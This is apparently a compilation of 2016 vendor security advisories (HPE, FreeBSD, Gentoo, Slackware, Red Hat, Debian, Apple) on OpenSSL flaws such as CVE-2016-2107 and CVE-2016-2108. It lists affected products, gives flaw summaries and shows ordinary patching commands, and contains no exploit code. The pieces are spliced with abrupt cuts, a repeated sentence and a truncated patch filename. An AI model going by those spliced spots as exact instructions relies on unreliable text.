- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5950 - Version: R6123
- HP Network Products
- JH321A HPE FlexFabric 5950 32QSFP28 Switch
- JH402A HPE FlexFabric 5950 48SFP28 8QSFP28 Switch
- JH404A HPE FlexFabric 5950 4-slot Switch
- 12900E (Comware 7) - Version: R2609
- HP Network Products
- JG619A HP FlexFabric 12910 Switch AC Chassis
- JG621A HP FlexFabric 12910 Main Processing Unit
- JG632A HP FlexFabric 12916 Switch AC Chassis
- JG634A HP FlexFabric 12916 Main Processing Unit
- JH104A HP FlexFabric 12900E Main Processing Unit
- JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit
- JH263A HP FlexFabric 12904E Main Processing Unit
- JH255A HP FlexFabric 12908E Switch Chassis
- JH262A HP FlexFabric 12904E Switch Chassis
- JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis
- JH103A HP FlexFabric 12916E Switch Chassis
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
iMC Products
- iNode PC 7.2 (E0410) - Version: 7.2 E0410
- HP Network Products
- JD144A HP A-IMC User Access Management Software Module with 200-user License
- JD147A HP IMC Endpoint Admission Defense Software Module with 200-user License
- JD435A HP A-IMC Endpoint Admission Defense Client Software
- JF388A HP IMC User Authentication Management Software Module with 200-user License
- JF388AAE HP IMC User Authentication Management Software Module with 200-user E-LTU
- JF391A HP IMC Endpoint Admission Defense Software Module with 200-user License
- JF391AAE HP IMC Endpoint Admission Defense Software Module with 200-user E-LTU
- JG752AAE HP IMC User Access Manager Software Module with 50-user E-LTU
- JG754AAE) HP IMC Endpoint Admission Defense Software Module with 50-user E-LTU
- CVEs
- CVE-2016-2106
- CVE-2016-2109
- CVE-2016-2176
- iMC UAM_TAM 7.2-E0409 - Version: 7.2 E0409
- HP Network Products
- JF388A HP IMC UAM S/W MODULE W/200-USER LICENSE
- JF388AAE HP IMC UAM S/W MODULE W/200-USER E-LTU
- JG752AAE HP IMC UAM SW MOD W/ 50-USER E-LTU
- JG483A HP IMC TAM S/W MODULE W/100-NODE LIC
- JG483AAE HP IMC TAM S/W MODULE W/100-NODE E-LTU
- JG764AAE HP IMC TAM SW MOD W/ 50-NODE E-LTU
- CVEs
- CVE-2016-2106
- CVE-2016-2109
- CVE-2016-2176
VCX Products
- VCX - Version: 9.8.19
- HP Network Products
- J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr
- J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr
- JC517A HP VCX V7205 Platform w/DL 360 G6 Server
- JE355A HP VCX V6000 Branch Platform 9.0
- JC516A HP VCX V7005 Platform w/DL 120 G6 Server
- JC518A HP VCX Connect 200 Primry 120 G6 Server
- J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr
- JE341A HP VCX Connect 100 Secondary
- JE252A HP VCX Connect Primary MIM Module
- JE253A HP VCX Connect Secondary MIM Module
- JE254A HP VCX Branch MIM Module
- JE355A HP VCX V6000 Branch Platform 9.0
- JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod
- JD023A HP MSR30-40 Router with VCX MIM Module
- JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM
- JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod
- JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod
- JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod
- JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS
- JE340A HP VCX Connect 100 Pri Server 9.0
- JE342A HP VCX Connect 100 Sec Server 9.0
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
Note: Please contact HPE Technical Support if any assistance is needed acquiring the software updates.
HISTORY Version:1 (rev.1) - 2 June 2017 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. Corrected: 2016-05-03 18:54:20 UTC (stable/10, 10.3-STABLE) 2016-05-04 15:25:47 UTC (releng/10.3, 10.3-RELEASE-p2) 2016-05-04 15:26:23 UTC (releng/10.2, 10.2-RELEASE-p16) 2016-05-04 15:27:09 UTC (releng/10.1, 10.1-RELEASE-p33) 2016-05-04 06:53:02 UTC (stable/9, 9.3-STABLE) 2016-05-04 15:27:09 UTC (releng/9.3, 9.3-RELEASE-p41) CVE Name: CVE-2016-2105, CVE-2016-2106, CVE-2016-2107, CVE-2016-2109, CVE-2016-2176
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit
FreeBSD includes software from the OpenSSL Project.
II. Problem Description
The padding check in AES-NI CBC MAC was rewritten to be in constant time by making sure that always the same bytes are read and compared against either the MAC or padding bytes. But it no longer checked that there was enough data to have both the MAC and padding bytes. [CVE-2016-2107]
An overflow can occur in the EVP_EncodeUpdate() function which is used for Base64 encoding of binary data. [CVE-2016-2105]
An overflow can occur in the EVP_EncryptUpdate() function, however it is believed that there can be no overflows in internal code due to this problem. [CVE-2016-2109]
ASN1 Strings that are over 1024 bytes can cause an overread in applications using the X509_NAME_oneline() function on EBCDIC systems. [CVE-2016-2176] FreeBSD does not run on any EBCDIC systems and therefore is not affected.
III. [CVE-2016-2109] TLS applications are not affected.
IV. Workaround
No workaround is available.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date.
Restart all daemons that use the library, or reboot the system.
2) To update your vulnerable system via a binary patch:
Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:
freebsd-update fetch
freebsd-update install
Restart all daemons that use the library, or reboot the system.
3) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to the applicable FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.
[FreeBSD 10.x]
fetch https://security.FreeBSD.org/patches/SA-16:17/openssl-10.patch
fetch https://security.FreeBSD.org/patches/SA-16:17/openssl-10.patch.asc
gpg --verify openssl-10.patch.asc
[FreeBSD 9.3]
fetch https://security.FreeBSD.org/patches/SA-16:17/openssl-9.patc
fetch https://security.FreeBSD.org/patches/SA-16:17/openssl-9.patch.asc
gpg --verify openssl-9.patch.asc
b) Apply the patch. Execute the following commands as root:
cd /usr/src
patch < /path/to/patch
c) Recompile the operating system using buildworld and installworld as
described in
Restart all daemons that use the library, or reboot the system.
VI. Correction details
The following list contains the correction revision numbers for each affected branch.
Branch/path Revision
stable/9/ r299053 releng/9.3/ r299068 stable/10/ r298999 releng/10.1/ r299068 releng/10.2/ r299067 releng/10.3/ r299066
To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed:
svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base
Or visit the following URL, replacing NNNNNN with the revision number:
VII.
Gentoo Linux Security Advisory GLSA 201612-16
https://security.gentoo.org/
Severity: Normal Title: OpenSSL: Multiple vulnerabilities Date: December 07, 2016 Bugs: #581234, #585142, #585276, #591454, #592068, #592074, #592082, #594500, #595186 ID: 201612-16
Synopsis
Multiple vulnerabilities have been found in OpenSSL, the worst of which allows attackers to conduct a time based side-channel attack.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/openssl < 1.0.2j >= 1.0.2j
Description
Multiple vulnerabilities have been discovered in OpenSSL. Please review the CVE identifiers and the International Association for Cryptologic Research's (IACR) paper, "Make Sure DSA Signing Exponentiations Really are Constant-Time" for further details. Additionally, a time based side-channel attack may allow a local attacker to recover a private DSA key.
Resolution
All OpenSSL users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-1.0.2j"
References
[ 1 ] CVE-2016-2105 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2105 [ 2 ] CVE-2016-2106 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2106 [ 3 ] CVE-2016-2107 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2107 [ 4 ] CVE-2016-2108 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2108 [ 5 ] CVE-2016-2109 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2109 [ 6 ] CVE-2016-2176 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2176 [ 7 ] CVE-2016-2177 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2177 [ 8 ] CVE-2016-2178 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2178 [ 9 ] CVE-2016-2180 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2180 [ 10 ] CVE-2016-2183 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2183 [ 11 ] CVE-2016-6304 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6304 [ 12 ] CVE-2016-6305 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6305 [ 13 ] CVE-2016-6306 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6306 [ 14 ] CVE-2016-7052 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7052 [ 15 ] Make Sure DSA Signing Exponentiations Really are Constant-Time http://eprint.iacr.org/2016/594.pdf
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201612-16
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
.
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/openssl-1.0.1t-i486-1_slack14.1.txz: Upgraded. +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated packages for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1t-i486-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1t-i486-1_slack14.0.txz
Updated packages for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1t-x86_64-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1t-x86_64-1_slack14.0.txz
Updated packages for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1t-i486-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1t-i486-1_slack14.1.txz
Updated packages for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1t-x86_64-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1t-x86_64-1_slack14.1.txz
Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.2h-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.2h-i586-1.txz
Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.2h-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.2h-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 14.0 packages: 033bd9509aeb07712e6bb3adf89c18e4 openssl-1.0.1t-i486-1_slack14.0.txz 9e91d781e33f7af80cbad08b245e84ed openssl-solibs-1.0.1t-i486-1_slack14.0.txz
Slackware x86_64 14.0 packages: e5c77ec16e3f2fcb2f1d53d84a6ba951 openssl-1.0.1t-x86_64-1_slack14.0.txz 2de7b6196a905233036d7f38008984bd openssl-solibs-1.0.1t-x86_64-1_slack14.0.txz
Slackware 14.1 packages: 96dcae05ae2f585c30de852a55eb870f openssl-1.0.1t-i486-1_slack14.1.txz 59618b061e62fd9d73ba17df7626b2e7 openssl-solibs-1.0.1t-i486-1_slack14.1.txz
Slackware x86_64 14.1 packages: 3d5ebfce099917703d537ab603e58a9b openssl-1.0.1t-x86_64-1_slack14.1.txz bf3a6bbdbe835dd2ce73333822cc9f06 openssl-solibs-1.0.1t-x86_64-1_slack14.1.txz
Slackware -current packages: 4889a10c5f3aa7104167c7d50eedf7ea a/openssl-solibs-1.0.2h-i586-1.txz 8e3439f35c3cb4e11ca64eebb238a52f n/openssl-1.0.2h-i586-1.txz
Slackware x86_64 -current packages: b4a852bb7e86389ec228288ccb7e79bb a/openssl-solibs-1.0.2h-x86_64-1.txz bcf9dc7bb04173f002644e3ce33ab4ab n/openssl-1.0.2h-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the packages as root:
upgradepkg openssl-1.0.1t-i486-1_slack14.1.txz openssl-solibs-1.0.1t-i486-1_slack14.1.txz
Then, reboot the machine or restart any network services that use OpenSSL.
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: openssl security update Advisory ID: RHSA-2016:0996-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-0996.html Issue date: 2016-05-10 CVE Names: CVE-2016-0799 CVE-2016-2105 CVE-2016-2106 CVE-2016-2107 CVE-2016-2108 CVE-2016-2109 CVE-2016-2842 =====================================================================
- Summary:
An update for openssl is now available for Red Hat Enterprise Linux 6.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library.
Security Fix(es):
-
A flaw was found in the way OpenSSL encoded certain ASN.1 data structures. An attacker could use this flaw to create a specially crafted certificate which, when verified or re-encoded by OpenSSL, could cause it to crash, or execute arbitrary code using the permissions of the user running an application compiled against the OpenSSL library. (CVE-2016-2108)
-
Two integer overflow flaws, leading to buffer overflows, were found in the way the EVP_EncodeUpdate() and EVP_EncryptUpdate() functions of OpenSSL parsed very large amounts of input data. A remote attacker could use these flaws to crash an application using OpenSSL or, possibly, execute arbitrary code with the permissions of the user running that application. (CVE-2016-2105, CVE-2016-2106)
-
It was discovered that OpenSSL leaked timing information when decrypting TLS/SSL and DTLS protocol encrypted records when the connection used the AES CBC cipher suite and the server supported AES-NI. A remote attacker could possibly use this flaw to retrieve plain text from encrypted packets by using a TLS/SSL or DTLS server as a padding oracle. (CVE-2016-2107)
-
Several flaws were found in the way BIO_*printf functions were implemented in OpenSSL. Applications which passed large amounts of untrusted data through these functions could crash or potentially execute code with the permissions of the user running such an application. (CVE-2016-0799, CVE-2016-2842)
-
A denial of service flaw was found in the way OpenSSL parsed certain ASN.1-encoded data from BIO (OpenSSL's I/O abstraction) inputs. An application using OpenSSL that accepts untrusted ASN.1 BIO input could be forced to allocate an excessive amount of data. (CVE-2016-2109)
Red Hat would like to thank the OpenSSL project for reporting CVE-2016-2108, CVE-2016-2842, CVE-2016-2105, CVE-2016-2106, CVE-2016-2107, and CVE-2016-0799. Upstream acknowledges Huzaifa Sidhpurwala (Red Hat), Hanno Böck, and David Benjamin (Google) as the original reporters of CVE-2016-2108; Guido Vranken as the original reporter of CVE-2016-2842, CVE-2016-2105, CVE-2016-2106, and CVE-2016-0799; and Juraj Somorovsky as the original reporter of CVE-2016-2107.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.
- Bugs fixed (https://bugzilla.redhat.com/):
1312219 - CVE-2016-0799 OpenSSL: Fix memory issues in BIO_*printf functions 1314757 - CVE-2016-2842 openssl: doapr_outch function does not verify that certain memory allocation succeeds 1330101 - CVE-2016-2109 openssl: ASN.1 BIO handling of large amounts of data 1331402 - CVE-2016-2108 openssl: Memory corruption in the ASN.1 encoder 1331426 - CVE-2016-2107 openssl: Padding oracle in AES-NI CBC MAC check 1331441 - CVE-2016-2105 openssl: EVP_EncodeUpdate overflow 1331536 - CVE-2016-2106 openssl: EVP_EncryptUpdate overflow
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: openssl-1.0.1e-48.el6_8.1.src.rpm
i386: openssl-1.0.1e-48.el6_8.1.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm
x86_64: openssl-1.0.1e-48.el6_8.1.i686.rpm openssl-1.0.1e-48.el6_8.1.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-devel-1.0.1e-48.el6_8.1.i686.rpm openssl-perl-1.0.1e-48.el6_8.1.i686.rpm openssl-static-1.0.1e-48.el6_8.1.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.1.i686.rpm openssl-devel-1.0.1e-48.el6_8.1.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.1.x86_64.rpm openssl-static-1.0.1e-48.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: openssl-1.0.1e-48.el6_8.1.src.rpm
x86_64: openssl-1.0.1e-48.el6_8.1.i686.rpm openssl-1.0.1e-48.el6_8.1.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.1.i686.rpm openssl-devel-1.0.1e-48.el6_8.1.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.1.x86_64.rpm openssl-static-1.0.1e-48.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: openssl-1.0.1e-48.el6_8.1.src.rpm
i386: openssl-1.0.1e-48.el6_8.1.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-devel-1.0.1e-48.el6_8.1.i686.rpm
ppc64: openssl-1.0.1e-48.el6_8.1.ppc.rpm openssl-1.0.1e-48.el6_8.1.ppc64.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.ppc.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.ppc64.rpm openssl-devel-1.0.1e-48.el6_8.1.ppc.rpm openssl-devel-1.0.1e-48.el6_8.1.ppc64.rpm
s390x: openssl-1.0.1e-48.el6_8.1.s390.rpm openssl-1.0.1e-48.el6_8.1.s390x.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.s390.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.s390x.rpm openssl-devel-1.0.1e-48.el6_8.1.s390.rpm openssl-devel-1.0.1e-48.el6_8.1.s390x.rpm
x86_64: openssl-1.0.1e-48.el6_8.1.i686.rpm openssl-1.0.1e-48.el6_8.1.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.1.i686.rpm openssl-devel-1.0.1e-48.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-perl-1.0.1e-48.el6_8.1.i686.rpm openssl-static-1.0.1e-48.el6_8.1.i686.rpm
ppc64: openssl-debuginfo-1.0.1e-48.el6_8.1.ppc64.rpm openssl-perl-1.0.1e-48.el6_8.1.ppc64.rpm openssl-static-1.0.1e-48.el6_8.1.ppc64.rpm
s390x: openssl-debuginfo-1.0.1e-48.el6_8.1.s390x.rpm openssl-perl-1.0.1e-48.el6_8.1.s390x.rpm openssl-static-1.0.1e-48.el6_8.1.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.1.x86_64.rpm openssl-static-1.0.1e-48.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: openssl-1.0.1e-48.el6_8.1.src.rpm
i386: openssl-1.0.1e-48.el6_8.1.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-devel-1.0.1e-48.el6_8.1.i686.rpm
x86_64: openssl-1.0.1e-48.el6_8.1.i686.rpm openssl-1.0.1e-48.el6_8.1.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.1.i686.rpm openssl-devel-1.0.1e-48.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm openssl-perl-1.0.1e-48.el6_8.1.i686.rpm openssl-static-1.0.1e-48.el6_8.1.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.1.x86_64.rpm openssl-static-1.0.1e-48.el6_8.1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2016-0799 https://access.redhat.com/security/cve/CVE-2016-2105 https://access.redhat.com/security/cve/CVE-2016-2106 https://access.redhat.com/security/cve/CVE-2016-2107 https://access.redhat.com/security/cve/CVE-2016-2108 https://access.redhat.com/security/cve/CVE-2016-2109 https://access.redhat.com/security/cve/CVE-2016-2842 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFXMXPXXlSAg2UNWIIRAmqpAJ4sxaxPc4fbLjR32h/PW1fxwOZG7ACgtaSz 6dbI0EemYRoHCDagPHSycq4= =g2Zb -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce. This could lead to a heap corruption. This could lead to a heap corruption.
CVE-2016-2108
David Benjamin from Google discovered that two separate bugs in the
ASN.1 encoder, related to handling of negative zero integer values
and large universal tags, could lead to an out-of-bounds write. This could result in arbitrary stack data
being returned in the buffer.
Additional information about these issues can be found in the OpenSSL security advisory at https://www.openssl.org/news/secadv/20160503.txt
For the stable distribution (jessie), these problems have been fixed in version 1.0.1k-3+deb8u5.
For the unstable distribution (sid), these problems have been fixed in version 1.0.2h-1.
We recommend that you upgrade your openssl packages.
References:
- CVE-2016-2107 - OpenSSL, Unauthorized disclosure of information
- CVE-2016-2106 - OpenSSL, Denial of Service (DoS)
- CVE-2016-2109 - OpenSSL, Denial of Service (DoS)
- CVE-2016-2105 - OpenSSL, Denial of Service (DoS)
- CVE-2016-3739 - cURL and libcurl, Remote code execution
- CVE-2016-5388 - "HTTPoxy", Apache Tomcat
- CVE-2016-5387 - "HTTPoxy", Apache HTTP Server
- CVE-2016-5385 - "HTTPoxy", PHP
- CVE-2016-4543 - PHP, multiple impact
- CVE-2016-4071 - PHP, multiple impact
- CVE-2016-4072 - PHP, multiple impact
- CVE-2016-4542 - PHP, multiple impact
- CVE-2016-4541 - PHP, multiple impact
- CVE-2016-4540 - PHP, multiple impact
- CVE-2016-4539 - PHP, multiple impact
- CVE-2016-4538 - PHP, multiple impact
- CVE-2016-4537 - PHP, multiple impact
- CVE-2016-4343 - PHP, multiple impact
- CVE-2016-4342 - PHP, multiple impact
- CVE-2016-4070 - PHP, Denial of Service (DoS)
- CVE-2016-4393 - PSRT110263, XSS vulnerability
- CVE-2016-4394 - PSRT110263, HSTS vulnerability
- CVE-2016-4395 - ZDI-CAN-3722, PSRT110115, Buffer Overflow
- CVE-2016-4396 - ZDI-CAN-3730, PSRT110116, Buffer Overflow
- PSRT110145
- PSRT110263
- PSRT110115
- PSRT110116
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
APPLE-SA-2016-07-18-1 OS X El Capitan v10.11.6 and Security Update 2016-004
OS X El Capitan v10.11.6 and Security Update 2016-004 is now available and addresses the following:
apache_mod_php
Available for:
OS X Yosemite v10.10.5 and OS X El Capitan v10.11 and later
Impact: A remote attacker may be able to execute arbitrary code
Description: Multiple issues existed in PHP versions prior to
5.5.36. These were addressed by updating PHP to version 5.5.36.
CVE-2016-4650
Audio Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved memory handling. CVE-2016-4647 : Juwei Lin (@fuzzerDOTcn) of Trend Micro
Audio Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to determine kernel memory layout Description: An out-of-bounds read was addressed through improved input validation. CVE-2016-4648 : Juwei Lin(@fuzzerDOTcn) of Trend Micro
Audio Available for: OS X El Capitan v10.11 and later Impact: Parsing a maliciously crafted audio file may lead to the disclosure of user information Description: An out-of-bounds read was addressed through improved bounds checking. CVE-2016-4646 : Steven Seeley of Source Incite working with Trend Micro's Zero Day Initiative
Audio Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to cause a system denial of service Description: A null pointer dereference was addressed through improved input validation. CVE-2016-4649 : Juwei Lin(@fuzzerDOTcn) of Trend Micro
bsdiff Available for: OS X El Capitan v10.11 and later Impact: A local attacker may be able to cause unexpected application termination or arbitrary code execution Description: An integer overflow existed in bspatch. This issue was addressed through improved bounds checking. CVE-2014-9862 : an anonymous researcher
CFNetwork Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to view sensitive user information Description: A permissions issue existed in the handling of web browser cookies. This issue was addressed through improved restrictions. CVE-2016-4645 : Abhinav Bansal of Zscaler Inc.
CoreGraphics Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code Description: A memory corruption issue was addressed through improved memory handling. CVE-2016-4637 : Tyler Bohan of Cisco Talos (talosintel.com /vulnerability-reports)
CoreGraphics Available for: OS X El Capitan v10.11 and later Impact: A local user may be able to elevate privileges Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation. CVE-2016-4652 : Yubin Fu of Tencent KeenLab working with Trend Micro's Zero Day Initiative
